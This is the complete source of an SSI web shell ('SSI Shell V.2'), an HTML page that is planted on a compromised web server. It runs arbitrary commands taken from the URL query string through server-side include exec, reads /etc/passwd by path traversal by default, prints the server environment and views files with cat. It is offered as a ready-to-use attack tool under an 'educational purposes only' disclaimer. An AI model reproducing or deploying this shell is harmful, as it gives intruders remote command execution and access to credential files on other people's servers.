SSI Shell V.2

1. <!--#config errmsg="[Error in shell]"-->
2. <!--#set var="zero" value="" -->
3. <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
4. <!--#set var="shl" value="ls -al" -->
5. <!--#else -->
6. <!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
7. <!--#endif -->
8. <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
9. <!--#set var="inc" value="/../../../../../../../etc/passwd" -->
10. <!--#else -->
11. <!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
12. <!--#endif -->
13. <html>
14. <head>
15. <title>
16. SSI Shell
17. </title>
18. <script language="javascript">
19. function fex()
20. {
21. document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
22. }
23. function vfile()
24. {
25. document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
26. }
27. </script>
28. </head>
29. <body bgcolor=#e4e0d8 alink=blue vlink=blue>
30. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
31. <center><b><font size=+2><a href=http://github.com/Anon-Exploiter>SSI Shell</a></font></b></center>
32. </div>
33. <br>
34. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
35. <center><b><font size=+1>Shell info</font></b></center>
36. <br>
37. <b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
38. <b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
39. <b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
40. <b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
41. <b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
42. <b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
43. <br>
44. </div>
45. <br>
46. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
47. <center><b><font size=+1>Server info</font></b></center>
48. <br>
49. <pre>
50. <!--#printenv-->
51. </pre>
52. <br>
53. </div>
54. <br>
55. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
56. <center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
57. <br>
58. <b><font color=blue>Enter command/address</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=command>&nbsp;<input type=button value=Run onclick=fex();>
59. <br>
60. </div>
61. <br>
62. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
63. <center><b><font size=+1>Shell</font></b></center>
64. <br>
65. <b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
66. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
67. <!--#exec cmd=$shl -->
68. </textarea>
69. <br>
70. </div>
71. <br>
72. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
73. <center><b><font size=+1>Operations on files</font></b></center>
74. <br>
75. <b><font color=blue>View file (cat)</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->>&nbsp;<input type=button value=Run onclick=vfile();><br>
76. <b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
77. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
78. <!--#include virtual=$inc -->
79. </textarea>
80. <br>
81. </div>
82. <br>
83. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
84. <center><b><font size=+1><a href=http://github.com/Anon-Exploiter>(c) :V ( :3 )</a></font></b><br><small>2009, v1.02<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
85. ONLY FOR EDUCATIONAL PURPOSES. ILLEGAL ACTIVITIES PROHIBITED.
86. </center>
87. </div>
88. </body>
89. </html>